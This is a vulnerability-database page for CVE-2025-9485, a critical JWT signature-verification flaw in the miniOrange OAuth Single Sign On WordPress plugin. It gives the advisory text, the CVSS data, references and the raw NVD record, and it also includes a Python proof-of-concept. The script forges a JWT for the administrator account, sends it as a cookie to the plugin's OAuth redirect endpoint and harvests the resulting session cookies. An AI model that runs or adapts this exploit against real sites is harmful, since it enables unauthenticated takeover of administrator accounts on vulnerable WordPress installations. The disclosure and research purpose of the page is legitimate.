CVE-2025-9485

Description

The OAuth Single Sign On – SSO (OAuth Client) plugin for WordPress is vulnerable to Improper Verification of Cryptographic Signature in versions up to, and including, 6.26.12. This is due to the plugin performing unsafe JWT token processing without verification or validation in the `get_resource_owner_from_id_token` function. This makes it possible for unauthenticated attackers to bypass authentication and gain access to any existing user account - including administrators in certain configurations - or to create arbitrary subscriber-level accounts.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

miniorange-login-with-eve-online-google-facebook <= 6.26.12

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-9485 PoC - WordPress OAuth SSO JWT Signature Verification Bypass # This PoC demonstrates how to forge a JWT token to bypass authentication import base64 import json import hmac import hashlib import requests TARGET_URL = "http://target-wordpress-site.com" def base64url_encode(data): """Encode bytes to base64url without padding""" return base64.urlsafe_b64encode(data).rstrip(b'=').decode() def forge_jwt(user_id, email, username, secret=""): """Forge a JWT token without proper signature verification""" # JWT Header - using HS256 algorithm header = { "alg": "HS256", "typ": "JWT" } # JWT Payload - set user identity information payload = { "sub": str(user_id), # Subject (user identifier) "email": email, # User email "name": username, # Username "preferred_username": username, "iss": "https://accounts.google.com", # Fake issuer "aud": "client_id_placeholder", "iat": 1700000000, "exp": 9999999999 # Far future expiration } # Encode header and payload header_b64 = base64url_encode(json.dumps(header, separators=(',', ':')).encode()) payload_b64 = base64url_encode(json.dumps(payload, separators=(',', ':')).encode()) # Create signature (plugin doesn't verify this properly) signing_input = f"{header_b64}.{payload_b64}" signature = hmac.new( secret.encode(), signing_input.encode(), hashlib.sha256 ).digest() signature_b64 = base64url_encode(signature) return f"{signing_input}.{signature_b64}" def exploit(target_url, user_id=1, email="[email protected]", username="admin"): """Exploit the JWT verification bypass to gain unauthorized access""" # Step 1: Forge a malicious JWT token forged_token = forge_jwt(user_id, email, username) print(f"[+] Forged JWT token: {forged_token[:50]}...") # Step 2: Send the forged token to the OAuth callback endpoint callback_url = f"{target_url}/?option=mo_oauth_redirect" cookies = {"mo_oauth_token": forged_token} response = requests.get(callback_url, cookies=cookies, allow_redirects=False) if response.status_code == 302: # Step 3: Extract session cookies from redirect session_cookies = response.cookies print(f"[+] Authentication bypassed! Session cookies obtained:") for cookie in session_cookies: print(f" {cookie.name} = {cookie.value}") return session_cookies else: print(f"[-] Exploitation failed. Status code: {response.status_code}") return None if __name__ == "__main__": # Attempt to login as admin (user_id=1 is typically the first admin) exploit(TARGET_URL, user_id=1, email="[email protected]", username="admin")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-9485
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-9485
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-9485/
[4] VulDB https://vuldb.com/cve/CVE-2025-9485
[5] https://plugins.trac.wordpress.org/browser/miniorange-login-with-eve-online-google-facebook/tags/6.26.12/class-mooauth-widget.php#L577
[6] https://plugins.trac.wordpress.org/changeset/3360768/miniorange-login-with-eve-online-google-facebook
[7] https://www.wordfence.com/threat-intel/vulnerabilities/id/d2448afc-70d1-4dd5-b73b-62d182ee9a8a?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-9485", "sourceIdentifier": "[email protected]", "published": "2025-10-04T03:15:38.780", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The OAuth Single Sign On – SSO (OAuth Client) plugin for WordPress is vulnerable to Improper Verification of Cryptographic Signature in versions up to, and including, 6.26.12. This is due to the plugin performing unsafe JWT token processing without verification or validation in the `get_resource_owner_from_id_token` function. This makes it possible for unauthenticated attackers to bypass authentication and gain access to any existing user account - including administrators in certain configurations - or to create arbitrary subscriber-level accounts."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-347"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/miniorange-login-with-eve-online-google-facebook/tags/6.26.12/class-mooauth-widget.php#L577", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3360768/miniorange-login-with-eve-online-google-facebook", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d2448afc-70d1-4dd5-b73b-62d182ee9a8a?source=cve", "source": "[email protected]"}]}}